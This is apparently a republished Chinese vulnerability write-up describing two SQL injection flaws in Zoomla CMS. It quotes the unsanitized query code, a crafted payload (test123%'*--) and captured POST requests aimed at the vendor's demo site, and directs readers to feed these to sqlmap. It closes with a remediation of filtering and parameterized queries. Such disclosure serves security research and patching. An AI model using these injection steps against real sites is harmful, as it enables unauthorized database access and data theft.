网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

逐浪CMS通用型SQL注入1+2 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 14:59 作者: 阅读:

[导读] 其实这套东西好多注入。注入1:http: demo zoomla cn mis target page aspxTxtKey参数string selectedValue = this drType SelectedValue;string text = this TxtKey Text;this dt = this bll Sel(stri...

其实这套东西好多注入。
 
注入1:
 
http://demo.zoomla.cn/mis/target/page.aspx
 
TxtKey参数
 
 
 
string selectedValue = this.drType.SelectedValue;

string text = this.TxtKey.Text;

this.dt = this.bll.Sel(string.Concat(new string[]

{

"ParentID=0 And Inputer='",

this.buser.GetLogin().UserName,

"' And type like '%",

selectedValue,

"%' And Title like '%",

text, //没有过滤直接带入查询,导致漏洞产生

"%'"

}), "ID desc");

 

 
前台注册一个用户。
 
先到http://demo.zoomla.cn/mis/target/AddTarget.aspx
 
添加一个名为test123的目标
 
访问下面的链接:
 
http://demo.zoomla.cn/mis/target/page.aspx
 
搜索test123
 
 
抓取数据包,把test123修改为test123%’*--
 
__VIEWSTATE=%2FwEPDwULLTEyMzkzMzg1NzcPZBYCAgMPZBYCAgcPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgExB3Rlc3QxMjNkZG7nnQ6pZXGUWElWkzGHXn71ZHNY&drType=&TxtKey=test123%’*--&Button1=%E6%90%9C%E7%B4%A2

 

连着cookie丢到sqlmap即可:
 


 
注入点2:
 
http://demo.zoomla.cn/mis/addmis.aspx
 
title参数
 
 
 
protected void Button_Click(object sender, EventArgs e)
 
 
DataTable dataTable = this.bll.Sel("Title='" + this.TextTitle.Text.Trim() + "'", ""); //title参数存在注入的问题。没有过滤
 
 
 
 
随便输入点信息:
 
点击确定,然后抓包
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMTY5OTMzNTg0ZGSXrsn5RKQ7H7z5jSEJzO1T2S1Tog%3D%3D&TextTitle=aaa&TextStatus=1&TextType=3&TextJoiner=a&StarDate=2013%2F10%2F24+10%3A50%3A01&EndDate=2013%2F10%2F24+10%3A50%3A04&TextContent=&BtnCommit=%E7%A1%AE%E5%AE%9A&ParentID=

 

 
 
TextTitle=aaa 存在注入
 
带上COOKIE丢到sqlmap即可
 



修复方案:
过滤,参数化查询

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论